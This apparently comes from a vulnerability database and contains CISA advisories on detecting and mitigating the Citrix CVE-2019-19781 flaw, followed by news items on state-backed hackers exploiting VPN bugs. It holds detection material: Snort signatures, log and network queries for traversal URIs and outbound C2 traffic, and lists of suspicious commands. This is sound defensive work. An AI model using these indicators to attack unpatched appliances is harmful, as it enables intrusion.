focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>_ _\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. \n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:07", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigations steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA releases a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released blog post on CVE-2019-19781 with timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15] ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).** Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability ](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785 ](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability ](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability ](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix 